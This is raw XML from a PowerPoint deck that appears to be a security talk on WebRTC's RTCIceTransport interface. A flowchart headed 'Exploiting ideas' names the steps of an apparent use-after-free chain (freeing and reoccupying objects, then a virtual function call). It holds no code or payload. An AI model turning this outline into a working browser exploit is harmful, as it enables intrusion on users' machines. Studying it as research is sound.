                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4210857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Background Knowledge</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5082535" cy="667875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebRTC</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{332CC131-5F40-46E0-8ACD-D0422748690C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084728" y="6518875"/>
            <a:ext cx="10831501" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebRTC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interfaces:RTCIceTransport</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1E3B2C-6392-42F7-864B-BF03A6839149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084729" y="3017219"/>
            <a:ext cx="9183221" cy="3487452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{945832A3-9CEF-45C3-AFFA-2B0863438829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084730" y="6951429"/>
            <a:ext cx="9215212" cy="2962965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41188333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Background Knowledge</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5082535" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RTCIceTransport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Method</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{655FB94F-EFC9-431A-B5AC-BD3D135E32EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084730" y="2983247"/>
            <a:ext cx="10953456" cy="2965210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDD2D2E8-EC86-4B02-A531-2211A94435DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084730" y="5948457"/>
            <a:ext cx="10953456" cy="1947747"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167078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8103A3CC-884C-439A-A3AE-F3426ADA5B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2602960"/>
            <a:ext cx="2247731" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Exploiting ideas</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形: 圆角 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4AF2EE-39DF-4026-B2FF-49BCF3A1382F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211692" y="3256554"/>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mn-ea"/>
              </a:rPr>
              <a:t>Assign dynamic objects</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形: 圆角 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{790E92F1-5771-4A76-B260-1B800946FFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833718" y="3256554"/>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latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>setRemoteCandidates</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形: 圆角 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDC2B9DF-6BC9-4B90-80AC-6E649C552BC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726061" y="4998028"/>
            <a:ext cx="3848894"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rPr>
              <a:t>UnpackArrayObjectVar</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="直接箭头连接符 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C74E547-5F8A-4516-AC7A-381F1679A16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4467298" y="3701054"/>
            <a:ext cx="74439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40" name="直接箭头连接符 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B4ADD38-7DC4-4339-A745-F47F4EE52FD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2650508" y="4145554"/>
            <a:ext cx="0" cy="852474"/>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45" name="直接箭头连接符 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{466AADC0-65ED-470C-BEDD-747C5A07CEF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="3"/>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4574955" y="5442528"/>
            <a:ext cx="636737" cy="238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49" name="矩形: 圆角 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD6B77C-4E70-443F-98B1-150BC56B3D74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211692" y="5000409"/>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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Free&amp;GC&amp;AllocateObject</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="直接箭头连接符 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC840D6D-BAA4-470D-A2D7-CF10FE904EBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="49" idx="0"/>
            <a:endCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6672192" y="4145554"/>
            <a:ext cx="0" cy="854855"/>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55" name="矩形: 圆角 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB2EA66-021A-42F6-9F3C-7044B3494C6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726061" y="6897704"/>
            <a:ext cx="3848894"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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="56" name="直接箭头连接符 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372BF2C3-09E8-4F3F-9508-F6C98C620371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="2"/>
            <a:endCxn id="55" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2650508" y="5887028"/>
            <a:ext cx="0" cy="1010676"/>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60" name="直接箭头连接符 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F02A6E6A-B212-476B-BF6D-D6D812DEFD3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="55" idx="3"/>
            <a:endCxn id="64" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4574955" y="7342204"/>
            <a:ext cx="649975"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64" name="矩形: 圆角 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F59756B8-E5B6-484C-97B2-D2567CA23A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5224930" y="6897704"/>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mn-ea"/>
              </a:rPr>
              <a:t>Function check</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68" name="连接符: 肘形 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8714C334-64A5-4A7F-AC10-3C4F6EAC0E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="64" idx="3"/>
            <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8132692" y="3701054"/>
            <a:ext cx="13238" cy="3641150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -4125246"/>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70" name="矩形: 圆角 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F296032E-F971-40C2-9A4A-E2762B0E92FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726061" y="8644087"/>
            <a:ext cx="3848894"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rPr>
              <a:t>UnpackDictionary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="直接箭头连接符 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB00914-8803-4589-8952-8F41E08E17CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="55" idx="2"/>
            <a:endCxn id="70" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2650508" y="7786704"/>
            <a:ext cx="0" cy="85738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74" name="矩形: 圆角 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2CF907E-66E6-46AB-861D-2A818DF346B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211692" y="8644087"/>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mn-ea"/>
              </a:rPr>
              <a:t>Virtual function call</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="75" name="直接箭头连接符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5AB4E75-62B3-4994-ACBA-196702B1DC70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="70" idx="3"/>
            <a:endCxn id="74" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4574955" y="9088587"/>
            <a:ext cx="636737"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79" name="连接符: 肘形 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17535F23-F27C-4D22-A9A1-F34E0984F310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="74" idx="3"/>
            <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8132692" y="3701054"/>
            <a:ext cx="12700" cy="5387533"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1350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81" name="矩形: 圆角 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E26A465F-073C-41B6-8A34-7AAC7F13DD10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233378" y="3256554"/>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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Occupy Object</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{959D45D6-C217-4F94-9C5C-9FA15C54551C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833718" y="4339988"/>
            <a:ext cx="1568287" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subfunction call</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C7C0F1-4BA0-48A1-9E5F-615CBF36C386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960017" y="6131586"/>
            <a:ext cx="1568287" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Follow-up function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0368639-0AE3-43FA-B0F5-5C5EECCC384F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058589" y="8028068"/>
            <a:ext cx="1568287" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Follow-up function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE23FE6-CDF5-4F45-A795-506AAE1C66E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4247702" y="4533951"/>
            <a:ext cx="1568287" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Callback</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C571D8-2102-49D0-AE13-E8CA224CD5F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
